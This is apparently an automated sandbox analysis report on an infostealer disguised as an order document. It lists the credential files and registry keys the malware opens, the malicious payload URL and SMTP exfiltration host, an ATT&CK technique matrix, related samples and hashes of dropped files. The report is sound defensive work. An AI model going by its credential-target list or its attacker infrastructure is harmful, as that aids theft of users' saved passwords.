            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00406054 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00406054
            Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            1
            Credentials in Registry
            117
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager341
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)241
            Virtualization/Sandbox Evasion
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Access Token Manipulation
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits22
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common111
            Process Injection
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Time Based Evasion
            DCSync1
            Time Based Evasion
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 716470 Sample: Order_request_0003352030_Ar... Startdate: 05/10/2022 Architecture: WINDOWS Score: 100 40 us2.smtp.mailhostbox.com 2->40 42 smtp.jubana.cam 2->42 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 7 other signatures 2->54 8 Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe 1 33 2->8         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->36 dropped 38 C:\Users\user\AppData\Local\...\System.dll, PE32 8->38 dropped 56 Writes to foreign memory regions 8->56 58 Mass process execution to delay analysis 8->58 60 Tries to detect Any.run 8->60 12 CasPol.exe 8->12         started        16 powershell.exe 8->16         started        18 powershell.exe 8->18         started        20 71 other processes 8->20 signatures6 process7 dnsIp8 44 103.156.93.29, 49837, 80 TWIDC-AS-APTWIDCLimitedHK unknown 12->44 46 us2.smtp.mailhostbox.com 208.91.199.224, 49842, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->46 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->64 66 Tries to steal Mail credentials (via file / registry access) 12->66 68 4 other signatures 12->68 22 conhost.exe 12->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        34 68 other processes 20->34 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe73%ReversingLabsWin32.Trojan.Leonem
            Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe62%VirustotalBrowse
            Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe33%MetadefenderBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll8%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll0%MetadefenderBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            smtp.jubana.cam11%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://3k8kPNo7ce8FL.comt-0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://103.156.93.29/GpqoIwsbfqqIcl84.xtp100%Avira URL Cloudmalware
            http://lgHVjR.com0%Avira URL Cloudsafe
            http://lgHVjR.com0%VirustotalBrowse
            https://3k8kPNo7ce8FL.com0%Avira URL Cloudsafe
            http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVs100%Avira URL Cloudmalware
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://smtp.jubana.cam100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            us2.smtp.mailhostbox.com
            208.91.199.224
            truefalse
              high
              smtp.jubana.cam
              unknown
              unknownfalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://103.156.93.29/GpqoIwsbfqqIcl84.xtpfalse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://3k8kPNo7ce8FL.comt-CasPol.exe, 00000097.00000002.67445612440.000000001D618000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://127.0.0.1:HTTP/1.1CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSCasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://lgHVjR.comCasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorOrder_request_0003352030_Arcelormittal_837478220293874639220654_documents.exefalse
                  high
                  https://3k8kPNo7ce8FL.comCasPol.exe, 00000097.00000002.67445839511.000000001D63E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVsCasPol.exe, 00000097.00000002.67423180687.0000000001068000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://us2.smtp.mailhostbox.comCasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://smtp.jubana.camCasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    103.156.93.29
                    unknownunknown
                    134687TWIDC-AS-APTWIDCLimitedHKfalse
                    208.91.199.224
                    us2.smtp.mailhostbox.comUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:716470
                    Start date and time:2022-10-05 09:33:05 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 13m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                    Run name:Suspected Instruction Hammering
                    Number of analysed new started processes analysed:155
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@215/6@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 30.5% (good quality ratio 30%)
                    • Quality average: 86.8%
                    • Quality standard deviation: 22%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 88
                    • Number of non-executed functions: 123
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    TimeTypeDescription
                    09:36:28API Interceptor2453x Sleep call for process: CasPol.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.156.93.29SecuriteInfo.com.Win32.Evo-gen.31438.15186.exeGet hashmaliciousBrowse
                    • 103.156.93.29/GnBxTI30.lzh
                    Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exeGet hashmaliciousBrowse
                    • 103.156.93.29/GuCtcOKrhSJTkMeQiL243.dsp
                    SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                    • 103.156.93.29/fENsCxXMHCKy237.ttf
                    SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                    • 103.156.93.29/oaULM141.emz
                    SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                    • 103.156.93.29/GNywZWtHMMV73.csv
                    Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exeGet hashmaliciousBrowse
                    • 103.156.93.29/rSUTNfNHLJYAQC23.jpb
                    KARL MAYER Offer PAGET C+A 09.07.exeGet hashmaliciousBrowse
                    • 103.156.93.29/XAWVWUiqKVoHTiESkFngHIal212.pcz
                    SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.30458.11641.exeGet hashmaliciousBrowse
                    • 103.156.93.29/TWoBhJLzHnQUJJkfkW215.smi
                    SecuriteInfo.com.NSIS.Injector.AOW.tr.1209.exeGet hashmaliciousBrowse
                    • 103.156.93.29/tdfpJSSWujPG41.dwp
                    SecuriteInfo.com.Win32.Evo-gen.2134.exeGet hashmaliciousBrowse
                    • 103.156.93.29/KeoEi165.inf
                    PO-GZ347-8432.exeGet hashmaliciousBrowse
                    • 103.156.93.29/jghvQudQtK230.pfb
                    Offer PAGET C+A 09.07.exeGet hashmaliciousBrowse
                    • 103.156.93.29/nImchRzmZgnjKMDgAIYMwLy71.pcx
                    RFQ-NEWL-2000_pdf.exeGet hashmaliciousBrowse
                    • 103.156.93.29/wUBmljX57.toc
                    PO AW109E.exeGet hashmaliciousBrowse
                    • 103.156.93.29/UJlqDmiXEMmlCKYs204.lpk
                    Document No.UESSCM002 rev 1.exeGet hashmaliciousBrowse
                    • 103.156.93.29/VQSDvDbfZHJS227.fla
                    Adriatic Capital Tender Document 2022 09 15_pdf.exeGet hashmaliciousBrowse
                    • 103.156.93.29/vIWFOFpd92.emz
                    SecuriteInfo.com.HEUR.Trojan.Win32.GuLoader.gen.23286.exeGet hashmaliciousBrowse
                    • 103.156.93.29/XdZyOtUFicHrnkjWc131.qxd
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    us2.smtp.mailhostbox.comSOA.EXE.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Aviso_de_Pagamento_.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    910635.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    soa.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Aviso_de_Pagamento_.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    SecuriteInfo.com.Win32.PWSX-gen.16745.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    DHL Shipment Doc6532291931_pdf.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    AvEQnWGwPb43iCj.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    October_Order.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    HRGRILL-KP2401 Pellet grill 2394-2492-4-yi8oo99.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Curriculum Vitae..exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    DOC_SKTSRI133_EV-PROF-2022-09-29_972484929923646208xE583sMS2tcO3o.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Curriculum Vitae..exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    AWB DOCS.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    Curriculum Vitae..exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    EGYPT ORDER.EXE.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWIDC-AS-APTWIDCLimitedHKSecuriteInfo.com.Win32.Evo-gen.31438.15186.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    Voicemail Audio Transcription.htmGet hashmaliciousBrowse
                    • 103.153.182.55
                    Qp7zXlMjyW.elfGet hashmaliciousBrowse
                    • 154.211.10.114
                    Order_request_0003352030_Arcelormittal_83747823544678839904478530654_documents.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    grW2oNaXqR.elfGet hashmaliciousBrowse
                    • 103.158.48.217
                    v22-003920.exeGet hashmaliciousBrowse
                    • 103.158.191.79
                    Ormat - RFQ-IMP 90881-00 5427-92407732DO4328105678387203.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    KARL MAYER Offer PAGET C+A 09.07.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    https://stpete.mobirisesite.com/Get hashmaliciousBrowse
                    • 103.153.183.146
                    SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.30458.11641.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    SecuriteInfo.com.NSIS.Injector.AOW.tr.1209.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    6Jjvn7F37w.elfGet hashmaliciousBrowse
                    • 103.157.218.84
                    SecuriteInfo.com.Win32.Evo-gen.2134.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    PO-GZ347-8432.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    EW2VNaHDDi.elfGet hashmaliciousBrowse
                    • 103.158.234.236
                    Offer PAGET C+A 09.07.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    RFQ-NEWL-2000_pdf.exeGet hashmaliciousBrowse
                    • 103.156.93.29
                    PUBLIC-DOMAIN-REGISTRYUSSOA.EXE.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    Aviso_de_Pagamento_.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    910635.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    swift advice (3).exeGet hashmaliciousBrowse
                    • 111.118.215.51
                    soa.exeGet hashmaliciousBrowse
                    • 208.91.198.143
                    swift advice (2).exeGet hashmaliciousBrowse
                    • 111.118.215.51
                    revised original documents.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    INQUIRY.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    ________.exeGet hashmaliciousBrowse
                    • 208.91.198.170
                    Aviso_de_Pagamento_.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    revised original documents.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    revised original documents.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    TAX INVOICE.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    payment copy (2).exeGet hashmaliciousBrowse
                    • 111.118.215.51
                    AvEQnWGwPb43iCj.exeGet hashmaliciousBrowse
                    • 208.91.199.225
                    http://njcqpc.avknt.khoormann.deenampro.com./#.aHR0cHM6Ly91c2VyLmxvZ290ZWMucGUvdGFzay9hMmh2YjNKdFlXNXVRSFZ1WTI5dGJpNWpiMjA9Get hashmaliciousBrowse
                    • 199.79.63.24
                    TAX INVOICE.exeGet hashmaliciousBrowse
                    • 162.215.240.200
                    October_Order.exeGet hashmaliciousBrowse
                    • 208.91.199.223
                    HRGRILL-KP2401 Pellet grill 2394-2492-4-yi8oo99.exeGet hashmaliciousBrowse
                    • 208.91.199.224
                    payment copy.exeGet hashmaliciousBrowse
                    • 111.118.215.51
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dllOrder_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeGet hashmaliciousBrowse
                      new order.xlsxGet hashmaliciousBrowse
                        PI_372572000079567W.exeGet hashmaliciousBrowse
                          PI_372572000079567W.exeGet hashmaliciousBrowse
                            RFQ73645937392344.exeGet hashmaliciousBrowse
                              RFQ73645937392344.exeGet hashmaliciousBrowse
                                OmslagstegningGermany.exeGet hashmaliciousBrowse
                                  OmslagstegningGermany.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exeGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Mal.Generic-S.9895.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Mal.Generic-S.31925.exeGet hashmaliciousBrowse
                                                        INVO-0987654345678.exeGet hashmaliciousBrowse
                                                          INVO-0987654345678.exeGet hashmaliciousBrowse
                                                            Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):11776
                                                            Entropy (8bit):5.655335921632966
                                                            Encrypted:false
                                                            SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                            MD5:EE260C45E97B62A5E42F17460D406068
                                                            SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                            SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                            SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Metadefender, Detection: 8%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
                                                            • Filename: new order.xlsx, Detection: malicious, Browse
                                                            • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                                            • Filename: PI_372572000079567W.exe, Detection: malicious, Browse
                                                            • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                                            • Filename: RFQ73645937392344.exe, Detection: malicious, Browse
                                                            • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                                            • Filename: OmslagstegningGermany.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Variant.Tedy.212656.21511.27993.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Variant.Tedy.212656.26118.5905.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Mal.Generic-S.9895.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Mal.Generic-S.31925.exe, Detection: malicious, Browse
                                                            • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                                            • Filename: INVO-0987654345678.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):6656
                                                            Entropy (8bit):5.139253382998066
                                                            Encrypted:false
                                                            SSDEEP:96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
                                                            MD5:1B0E41F60564CCCCCD71347D01A7C397
                                                            SHA1:B1BDDD97765E9C249BA239E9C95AB32368098E02
                                                            SHA-256:13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
                                                            SHA-512:B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):824
                                                            Entropy (8bit):5.20249576082362
                                                            Encrypted:false
                                                            SSDEEP:24:t4CBGDT/MA6x+mXkvG3ll4AeW0WNDNHkdMRAeW0fcj:gDT/owRvGn4AewpOiAe5cj
                                                            MD5:4F05487595F8C324710ACC9E0359A72F
                                                            SHA1:20FFAD557E25CA662F3EF4FCC0A0479F483B209E
                                                            SHA-256:9BFFBE1954818E8A73B0A11734BC1D684118DF513766EDDD5C424E8FEBE74FAA
                                                            SHA-512:128526C5A71F1E885E4F18157AEE73F7EEE98FBA15C32A28F42D9FCFAD953972409264F82F6A3A14A1AA1FAC829F39DB9CEAD2FEE06C0258F26DCBE2142BC751
                                                            Malicious:false
